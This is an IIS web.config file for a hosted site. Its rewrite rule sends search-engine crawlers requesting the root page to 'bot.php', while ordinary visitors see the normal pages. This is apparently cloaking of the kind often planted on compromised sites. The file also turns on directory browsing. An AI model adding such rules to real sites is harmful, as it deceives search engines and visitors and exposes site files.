<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="1" patternSyntax="ECMAScript" stopProcessing="true">
          <match url="^$" ignoreCase="true" negate="false" />
          <conditions logicalGrouping="MatchAny" trackAllCaptures="false">
            <add input="{HTTP_USER_AGENT}" pattern="Googlebot|Yahoo|MSNBot|bingbot" />
          </conditions>
          <action type="Rewrite" url="bot.php" />
        </rule>
      </rules>
    </rewrite>
    <directoryBrowse enabled="true" />
    <defaultDocument>
      <files>
        <clear />
        <add value="Default.htm" />
        <add value="Default.asp" />
        <add value="index.htm" />
        <add value="Default.aspx" />
        <add value="index.php" />
        <add value="index.html" />
        <add value="index.pl" />
        <add value="default.html" />
        <add value="index.asp" />
        <add value="index.aspx" />
      </files>
    </defaultDocument>
    <httpProtocol>
      <customHeaders>
        <clear />
        <add name="X-Powered-By" value="ASP.NET" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
  <system.web>
    <compilation tempDirectory="D:\InetPub\vhosts\mksreten-1341.package\tmp" />
  </system.web>
</configuration>